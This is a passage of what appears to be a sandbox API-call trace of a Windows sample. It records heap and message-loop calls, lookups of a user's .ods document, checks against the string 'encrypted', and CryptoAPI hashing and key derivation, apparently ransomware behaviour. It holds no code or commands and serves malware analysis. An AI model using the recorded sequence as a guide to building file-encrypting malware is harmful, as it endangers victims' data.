lpUsedDefaultChar=0x0) returned 12 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0033.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.156] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.156] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.157] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.157] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x37ff5ba0, ftLastWriteTime.dwHighDateTime=0x1d5c3fa, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x0, dwReserved1=0x777648, cFileName="iZLE.ods", cAlternateFileName="")) returned 0x7c20c0 [0033.157] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x37ff5ba0, ftLastWriteTime.dwHighDateTime=0x1d5c3fa, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x0, dwReserved1=0x777648, cFileName="iZLE.ods", cAlternateFileName="")) returned 0x7c20c0 [0033.157] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iZLE.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.159] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x37ff5ba0, ftLastWriteTime.dwHighDateTime=0x1d5c3fa, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="iZLE.ods", cAlternateFileName="")) returned 0x7c2100 [0033.159] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.159] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.159] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.159] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.159] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.160] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.160] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0033.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.161] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.161] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.161] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.162] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.162] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.162] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.163] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.163] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.163] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.164] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 